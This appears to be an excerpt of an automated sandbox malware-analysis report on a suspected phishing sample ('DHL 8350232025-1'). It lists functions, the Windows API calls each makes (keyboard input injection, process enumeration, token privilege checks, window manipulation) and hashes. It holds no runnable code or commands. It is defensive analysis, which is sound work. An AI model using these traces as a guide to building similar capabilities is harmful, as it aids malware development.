SetWindowLongW.USER32(?,000000F0,00000000), ref: 00235382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002353A8

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: 24a7ad400c8b6741cee4633d8d81a38ade6b9dbca81bb6c4ebc7dcfc5faa5909
Instruction ID: 9b6306779df70f8dd2cef41f5853a4338c8bc762c390593b0b2d9f72c10e71f7
Opcode Fuzzy Hash: 24a7ad400c8b6741cee4633d8d81a38ade6b9dbca81bb6c4ebc7dcfc5faa5909
Instruction Fuzzy Hash: AF31C5B4A75A29EFEB349F14CC0AFE83765EB04390F584181FA18961E1C7F49DA0DB42

Function 0020AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 0020ABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 0020AC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 0020AC74
SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 0020ACC6

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 39d10935f206d1d5635e338387c3c8b5c67e3bd2102e5b0b620e54fa3cece55c
Instruction ID: e2e61b4be66ce74adf1fcd1f7116ad5efd8200e46959aab9a1265462491bcd6f
Opcode Fuzzy Hash: 39d10935f206d1d5635e338387c3c8b5c67e3bd2102e5b0b620e54fa3cece55c
Instruction Fuzzy Hash: 71312630A24719AFFF35CF648C097FE7BA5AB89310F85431BE485961D2C37489A18B52

Function 00237674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0023769A
GetWindowRect.USER32(?,?), ref: 00237710
PtInRect.USER32(?,?,00238B89), ref: 00237720
MessageBeep.USER32(00000000), ref: 0023778C

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 9ac3c2fd2692b3153637165fc442310dfc05e458bf5e4b768ea706ed609c3384
Instruction ID: 94fe7ef6f0eaa5b83766cf3b78c08608a899c3d747d86b56cc39a5469e9f1b76
Opcode Fuzzy Hash: 9ac3c2fd2692b3153637165fc442310dfc05e458bf5e4b768ea706ed609c3384
Instruction Fuzzy Hash: 12419CF4A15215EFCF21CF58D899EA9B7F4BF49314F1440A8E5149B261C330E9A2CF90

Function 002316DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 002316EB

Part of subcall function 00203A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00203A57
Part of subcall function 00203A3D: GetCurrentThreadId.KERNEL32 ref: 00203A5E
Part of subcall function 00203A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002025B3), ref: 00203A65

GetCaretPos.USER32(?), ref: 002316FF
ClientToScreen.USER32(00000000,?), ref: 0023174C
GetForegroundWindow.USER32 ref: 00231752

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: c1ae3a35c4886b05b52b8c542683306db877fdddb12b53a607729d44fa630326
Instruction ID: 9ff6b85bb49835769f1fce44446409e5f94e2e64166adb957cc087dfd073bf7e
Opcode Fuzzy Hash: c1ae3a35c4886b05b52b8c542683306db877fdddb12b53a607729d44fa630326
Instruction Fuzzy Hash: E83161B5E10209AFCB00EFA9C881CAEF7FDEF59304B548069E415E7251D7319E45CBA0

Function 0020D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0020D501
Process32FirstW.KERNEL32(00000000,?), ref: 0020D50F
Process32NextW.KERNEL32(00000000,?), ref: 0020D52F
CloseHandle.KERNEL32(00000000), ref: 0020D5DC

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 296b199c8404c96e080fb2bece8db96d3a3799d67e1ca75d7dd3ff2f7b713aaa
Instruction ID: a15d1f461ae3f1c853f0ddb245025af0232908154bf06eb2c0012bee73bf01b7
Opcode Fuzzy Hash: 296b199c8404c96e080fb2bece8db96d3a3799d67e1ca75d7dd3ff2f7b713aaa
Instruction Fuzzy Hash: D631C2710083019FD301EF64DC85AAFBBF8EFAA354F54092DF585961A2EB719944CB92

Function 00238FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001B9BB2

GetCursorPos.USER32(?), ref: 00239001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,001F7711,?,?,?,?,?), ref: 00239016
GetCursorPos.USER32(?), ref: 0023905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,001F7711,?,?,?), ref: 00239094

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 8234e675be480c68ad74b247f72b6f3809784de36023d17b22793cef4588dc46
Instruction ID: 3c06c5f7824eadbe2ccfecaee6761af5b5aea62fa7f23dbd25a3819e1baadbf5
Opcode Fuzzy Hash: 8234e675be480c68ad74b247f72b6f3809784de36023d17b22793cef4588dc46
Instruction Fuzzy Hash: 3D21E275610118EFDB298F98DC58EFA3BB9EF8A350F104065F90557261C3719DA1DF60

Function 0020D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0023CB68), ref: 0020D2FB
GetLastError.KERNEL32 ref: 0020D30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 0020D319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0023CB68), ref: 0020D376

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 63f0549ce63736c6cd422d87afa89d9b57c5b6e45cd9cbd753edb3b5f80f641a
Instruction ID: 178b8dfb626e7386ece19bb1690097ca33e358459effca8d9f703aafb064a3d5
Opcode Fuzzy Hash: 63f0549ce63736c6cd422d87afa89d9b57c5b6e45cd9cbd753edb3b5f80f641a
Instruction Fuzzy Hash: 8121BF7451A3029FC300DFA8D88186AB7E4AE56364F204A5DF899D72E2D730D956CF93

Function 00201571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00201014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0020102A
Part of subcall function 00201014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00201036
Part of subcall function 00201014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00201045
Part of subcall function 00201014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0020104C
Part of subcall function 00201014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00201062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 002015BE
_memcmp.LIBVCRUNTIME ref: 002015E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00201617
HeapFree.KERNEL32(00000000), ref: 0020161E

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 9f02cf79353054e084f5f09e0f308327dde137b439e3276a005df4806af83ca0
Instruction ID: 0d52308b8c6ba4720dad725c939db3ac5ba9266581798614808d0f6ddfced2ec
Opcode Fuzzy Hash: 9f02cf79353054e084f5f09e0f308327dde137b439e3276a005df4806af83ca0
Instruction Fuzzy Hash: 1D21CF31E10209EFDF04DFA4CD48BEEB7B8EF40344F184459E441AB282E731AA64DBA0

Function 00232782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 0023280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00232824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00232832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00232840

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 10ce25f19793bc41ad41a17e3bc81fca9284308b5cdeb402ce9372277d248bb2
Instruction ID: 5a0b1e5b54779b1ab6a1b1afc88f48e0fa987e26ddb4ee19cb698d53511fc921
Opcode Fuzzy Hash: 10ce25f19793bc41ad41a17e3bc81fca9284308b5cdeb402ce9372277d248bb2
Instruction Fuzzy Hash: F921F135218111EFD7149F24D844FAABB99EF85324F248158F4268B2E2CB71FC56CB90

Function 002078F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00208D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0020790A,?,000000FF,?,00208754,00000000,?,0000001C,?,?), ref: 00208D8C
Part of subcall function 00208D7D: lstrcpyW.KERNEL32(00000000,?,?,0020790A,?,000000FF,?,00208754,00000000,?,0000001C,?,?,00000000), ref: 00208DB2
Part of subcall function 00208D7D: lstrcmpiW.KERNEL32(00000000,?,0020790A,?,000000FF,?,00208754,00000000,?,0000001C,?,?), ref: 00208DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00208754,00000000,?,0000001C,?,?,00000000), ref: 00207923
lstrcpyW.KERNEL32(00000000,?,?,00208754,00000000,?,0000001C,?,?,00000000), ref: 00207949
lstrcmpiW.KERNEL32(00000002,cdecl,?,00208754,00000000,?,0000001C,?,?,00000000), ref: 00207984

Strings

cdecl, xrefs: 0020797B

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 7744a0f13a581d2c8f5fa5d93a9741a53be688acad2ecce68cbcc3a74d1b8f54
Instruction ID: 5572d93e1d54f9924277575d462bdc7e3f3e1ebc3481070188897ded137f1142
Opcode Fuzzy Hash: 7744a0f13a581d2c8f5fa5d93a9741a53be688acad2ecce68cbcc3a74d1b8f54
Instruction Fuzzy Hash: D011263A210346ABCB159F38DC49D7B77A9FF85350B10402AF846C72A5EB31E821D7A1

Function 00237CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00237D0B
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00237D2A
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00237D42
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0021B7AD,00000000), ref: 00237D6B

Part of subcall function 001B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001B9BB2

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: 414243a102f3acd9a689809acd440681a9d1e15cce2a7870cf69751bac485aa5
Instruction ID: bd914bbe258b8f2ce36fe857d2e0a4d0e3a6130eee9f9d55b1677c85dcfea933
Opcode Fuzzy Hash: 414243a102f3acd9a689809acd440681a9d1e15cce2a7870cf69751bac485aa5
Instruction Fuzzy Hash: 8211D2B1224659AFCF209F28DC08EA63BA4AF45361F218724F939D72F0D7308971DB40

Function 00235660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 002356BB
_wcslen.LIBCMT ref: 002356CD
_wcslen.LIBCMT ref: 002356D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 00235816

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: a9f3cc2e8c606e75df4b42cbb4e4afb1decbc8d0320acfa629e4aeb2bbd170b2
Instruction ID: cf728a5199ecb65c68ecf7a1380d3670676de3f5405e0e35d27b340e0714b5b2
Opcode Fuzzy Hash: a9f3cc2e8c606e75df4b42cbb4e4afb1decbc8d0320acfa629e4aeb2bbd170b2
Instruction Fuzzy Hash: 9E1106B162062596DF20DF65DC85AEE77BCFF15764F10402AF909D6081E7B0CAA0CF60

Function 001D1D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ca198a0b55bac97a11c2405f258573c62f6786046470bebd759a191049948d4
Instruction ID: 37db8c0d2eb59fa95e6f912c15d6ba514b948b1fc484fa7a2557e30560b1d5a4
Opcode Fuzzy Hash: 8ca198a0b55bac97a11c2405f258573c62f6786046470bebd759a191049948d4
Instruction Fuzzy Hash: E8016DB2209A567EFA2126B87CC9F67661EDF517B8B350327F536A13D2DB708C409170

Function 00201A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00201A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00201A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00201A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00201A8A

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5af8b672318b9da5b9a488745000a29c3439099c75700ca603b2c3bcb01ad90d
Instruction ID: 22a0d43d6f9f29da9a49029a86d926715ebe83f278fa958701178722b64e781c
Opcode Fuzzy Hash: 5af8b672318b9da5b9a488745000a29c3439099c75700ca603b2c3bcb01ad90d
Instruction Fuzzy Hash: 3511F73AA01219FFEB119BA5CD85FADBB78EB08750F200091EA04B7295D6716E60DB94

Function 0020E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0020E1FD
MessageBoxW.USER32(?,?,?,?), ref: 0020E230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0020E246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0020E24D

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 2aa766b199b5485c2b48aaa4b1370d90f89ff4763ff8195da6a797ce5bfd5bb8
Instruction ID: c6bbcdd37024315def9afd3b0e24a7292894fdafb2b651424d4476b2a3da1ff3
Opcode Fuzzy Hash: 2aa766b199b5485c2b48aaa4b1370d90f89ff4763ff8195da6a797ce5bfd5bb8
Instruction Fuzzy Hash: 7611E172904314BFCB019FA8BC0DA9A7BACAB45324F104669FC28E3291D2B0CD6087A0

Function 001CD1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,001CCFF9,00000000,00000004,00000000), ref: 001CD218
GetLastError.KERNEL32 ref: 001CD224
__dosmaperr.LIBCMT ref: 001CD22B
ResumeThread.KERNEL32(00000000), ref: 001CD249

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 7600a6a4cb4779b8973521acb7ff1bfe657f9926968587643de42bb0ef6e586d
Instruction ID: 665b86a62571d2d0fd1923c2ba986f61cf1de3218df20ad771107189fcd8ec01
Opcode Fuzzy Hash: 7600a6a4cb4779b8973521acb7ff1bfe657f9926968587643de42bb0ef6e586d
Instruction Fuzzy Hash: 6001D276805204BBCB216BA5EC09FAE7A6DDFB1730F20026DF925921D0CF70C901D7A0

Function 001A600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001A604C
GetStockObject.GDI32(00000011), ref: 001A6060
SendMessageW.USER32(00000000,00000030,00000000), ref: 001A606A

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 3ee0f847bbc1e9d51586a75a10c372e231211d51d448149c7479ad290ab64b01
Instruction ID: 3037f904e9d79aad46ca5210dce4db11595f3d722140c48678b7624457ed8606
Opcode Fuzzy Hash: 3ee0f847bbc1e9d51586a75a10c372e231211d51d448149c7479ad290ab64b01
Instruction Fuzzy Hash: C011AD72101908BFEF164FA49D48EEABB6DEF093A4F190201FA1462010C736DCA0EBA0

Function 001C3B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 001C3B56

Part of subcall function 001C3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 001C3AD2
Part of subcall function 001C3AA3: ___AdjustPointer.LIBCMT ref: 001C3AED

_UnwindNestedFrames.LIBCMT ref: 001C3B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 001C3B7C
CallCatchBlock.LIBVCRUNTIME ref: 001C3BA4

Memory Dump Source

